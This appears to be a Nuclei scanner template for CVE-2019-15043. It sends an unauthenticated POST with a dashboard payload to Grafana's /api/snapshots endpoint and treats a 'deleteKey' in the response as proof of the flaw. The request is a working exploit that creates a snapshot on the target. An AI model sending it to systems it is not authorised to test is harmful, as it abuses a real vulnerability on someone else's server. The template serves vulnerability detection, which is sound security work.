id: CVE-2019-15043
info:
  author: bing0o
  name: Grafana unauthenticated API
  severity: medium
  tags: cve,cve2019,grafana

requests:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Length: 235
        Accept: */*
        Accept-Language: en
        Content-Type: application/json

        {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

    matchers:
      - part: body
        type: word
        words:
          - deleteKey